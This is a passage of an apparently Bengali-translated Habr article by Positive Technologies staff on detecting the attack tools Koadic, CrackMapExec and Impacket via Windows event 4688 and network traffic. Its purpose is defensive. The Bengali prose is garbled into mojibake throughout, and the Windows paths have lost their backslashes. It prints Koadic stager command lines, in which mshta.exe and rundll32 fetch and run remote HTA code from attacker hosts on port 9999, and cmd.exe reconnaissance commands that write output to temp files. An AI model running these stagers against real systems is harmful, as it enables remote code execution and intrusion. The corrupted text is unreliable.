- winHttpRequests API āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§,
- ActiveXObject āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻāĻāĻŋ WScript.Shell āĻ āĻŦāĻā§āĻā§āĻ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž,
- āĻŦāĻĄāĻŧ āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻā§āĻŦāĻ˛ āĻŦāĻĄāĻŋāĨ¤
āĻĒā§āĻ°āĻžāĻĨāĻŽāĻŋāĻ āĻ¸āĻāĻ¯ā§āĻ āĻ¸ā§āĻā§āĻāĻžāĻ° āĻļā§āĻ°ā§ āĻāĻ°ā§, āĻ¤āĻžāĻ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻāĻā§āĻ¨ā§āĻā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻ° āĻāĻžāĻ°ā§āĻ¯āĻāĻ˛āĻžāĻĒ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻž āĻ¸āĻŽā§āĻāĻŦ āĻšāĻ¯āĻŧāĨ¤ mshta-āĻāĻ° āĻāĻ¨ā§āĻ¯, āĻāĻāĻŋ āĻāĻā§āĻ¨ā§āĻ 4688, āĻ¯āĻž āĻ¸ā§āĻāĻ¨āĻž āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ āĻ¸āĻš āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋāĻ° āĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°ā§:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
Koadic āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻ¸āĻŽāĻ¯āĻŧ, āĻ āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ 4688 āĻāĻā§āĻ¨ā§āĻāĻā§āĻ˛āĻŋ āĻāĻŽāĻ¨ āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯āĻā§āĻ˛āĻŋāĻ° āĻ¸āĻžāĻĨā§ āĻĻā§āĻāĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻ¯āĻž āĻāĻāĻŋāĻā§ āĻĒā§āĻ°ā§āĻĒā§āĻ°āĻŋ āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯āĻ¯ā§āĻā§āĻ¤ āĻāĻ°ā§:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
āĻ¤āĻĨā§āĻ¯āĻ
āĻ˛ā§āĻ¯āĻžāĻ¨ā§āĻĄ āĻ
āĻĢ āĻ˛ā§āĻ¯āĻžāĻ¨ā§āĻĄ āĻĒā§āĻ°āĻŦāĻŖāĻ¤āĻž āĻ¸āĻžāĻāĻŦāĻžāĻ° āĻ
āĻĒāĻ°āĻžāĻ§ā§āĻĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻ¨āĻĒā§āĻ°āĻŋāĻ¯āĻŧāĻ¤āĻž āĻ
āĻ°ā§āĻāĻ¨ āĻāĻ°āĻā§āĨ¤ āĻ¤āĻžāĻ°āĻž āĻ¤āĻžāĻĻā§āĻ° āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŦāĻŋāĻ˛ā§āĻ-āĻāĻ¨ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻā§āĻ˛ āĻāĻŦāĻ āĻŽā§āĻāĻžāĻ¨āĻŋāĻāĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻāĻŽāĻ°āĻž āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ āĻāĻ¨āĻĒā§āĻ°āĻŋāĻ¯āĻŧ āĻā§āĻ˛ Koadic, CrackMapExec āĻāĻŦāĻ Impacket āĻāĻ āĻ¨ā§āĻ¤āĻŋ āĻ
āĻ¨ā§āĻ¸āĻ°āĻŖ āĻāĻ°ā§ APT āĻ°āĻŋāĻĒā§āĻ°ā§āĻā§ āĻāĻ°āĻ āĻāĻ¨ āĻāĻ¨ āĻĒā§āĻ°āĻĻāĻ°ā§āĻļāĻŋāĻ¤ āĻšāĻā§āĻā§āĨ¤ āĻāĻ āĻ¸āĻ°āĻā§āĻāĻžāĻŽāĻā§āĻ˛āĻŋāĻ° āĻāĻ¨ā§āĻ¯ GitHub-āĻ āĻāĻžāĻāĻāĻžāĻāĻžāĻŽāĻā§āĻ° āĻ¸āĻāĻā§āĻ¯āĻžāĻ āĻā§āĻ°āĻŽāĻŦāĻ°ā§āĻ§āĻŽāĻžāĻ¨ āĻšāĻā§āĻā§, āĻ¨āĻ¤ā§āĻ¨āĻā§āĻ˛āĻŋ āĻāĻĒāĻ¸ā§āĻĨāĻŋāĻ¤ āĻšāĻā§āĻā§ (āĻāĻā§āĻ˛āĻŋ āĻāĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§ āĻĒā§āĻ°āĻžāĻ¯āĻŧ āĻāĻ āĻšāĻžāĻāĻžāĻ° āĻ°āĻ¯āĻŧā§āĻā§)āĨ¤ āĻĒā§āĻ°āĻŦāĻŖāĻ¤āĻžāĻāĻŋ āĻ¤āĻžāĻ° āĻ¸āĻ°āĻ˛āĻ¤āĻžāĻ° āĻāĻžāĻ°āĻŖā§ āĻāĻ¨āĻĒā§āĻ°āĻŋāĻ¯āĻŧāĻ¤āĻž āĻĒāĻžāĻā§āĻā§: āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻ¤ā§āĻ¤ā§āĻ¯āĻŧ āĻĒāĻā§āĻˇā§āĻ° āĻ¸āĻ°āĻā§āĻāĻžāĻŽā§āĻ° āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨ āĻšāĻ¯āĻŧ āĻ¨āĻž, āĻ¤āĻžāĻ°āĻž āĻāĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§āĻ āĻā§āĻˇāĻ¤āĻŋāĻā§āĻ°āĻ¸ā§āĻ¤āĻĻā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻ°āĻ¯āĻŧā§āĻā§ āĻāĻŦāĻ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻŦā§āĻ¯āĻŦāĻ¸ā§āĻĨāĻž āĻŦāĻžāĻāĻĒāĻžāĻ¸ āĻāĻ°āĻ¤ā§ āĻ¸āĻšāĻžāĻ¯āĻŧāĻ¤āĻž āĻāĻ°ā§āĨ¤ āĻāĻŽāĻ°āĻž āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻŽāĻŋāĻĨāĻ¸ā§āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ
āĻ§ā§āĻ¯āĻ¯āĻŧāĻ¨ā§āĻ° āĻāĻĒāĻ° āĻĻā§āĻˇā§āĻāĻŋ āĻ¨āĻŋāĻŦāĻĻā§āĻ§ āĻāĻ°āĻāĻŋ: āĻāĻĒāĻ°ā§ āĻŦāĻ°ā§āĻŖāĻŋāĻ¤ āĻĒā§āĻ°āĻ¤āĻŋāĻāĻŋ āĻā§āĻ˛ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻ¤āĻžāĻ° āĻāĻŋāĻšā§āĻ¨ āĻ°ā§āĻā§ āĻ¯āĻžāĻ¯āĻŧ; āĻ¤āĻžāĻĻā§āĻ° āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤ āĻ
āĻ§ā§āĻ¯āĻ¯āĻŧāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻĒāĻŖā§āĻ¯ āĻļā§āĻāĻžāĻ¤ā§ āĻ
āĻ¨ā§āĻŽāĻ¤āĻŋ āĻĻā§āĻ¯āĻŧ
āĻ˛ā§āĻāĻ:
- āĻ ā§āĻ¯āĻžāĻ¨ā§āĻāĻ¨ āĻāĻŋāĻāĻ°āĻŋāĻ¨, āĻŦāĻŋāĻļā§āĻˇāĻā§āĻ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻŦāĻŋāĻāĻžāĻā§āĻ° āĻĒā§āĻ°āĻ§āĻžāĻ¨, āĻĒāĻŋāĻāĻŋ āĻŦāĻŋāĻļā§āĻˇāĻā§āĻ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻā§āĻ¨ā§āĻĻā§āĻ°, āĻĒāĻāĻŋāĻāĻŋāĻ āĻā§āĻāĻ¨ā§āĻ˛āĻāĻŋāĻ¸
- āĻāĻāĻ° āĻĒāĻĄāĻŽā§āĻāĻ, āĻŦāĻŋāĻļā§āĻˇāĻā§āĻ, āĻĒāĻŋāĻāĻŋ āĻŦāĻŋāĻļā§āĻˇāĻā§āĻ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻā§āĻ¨ā§āĻĻā§āĻ°, āĻĒāĻāĻŋāĻāĻŋāĻ āĻā§āĻāĻ¨ā§āĻ˛āĻāĻŋāĻ¸
āĻāĻ¤ā§āĻ¸: www.habr.com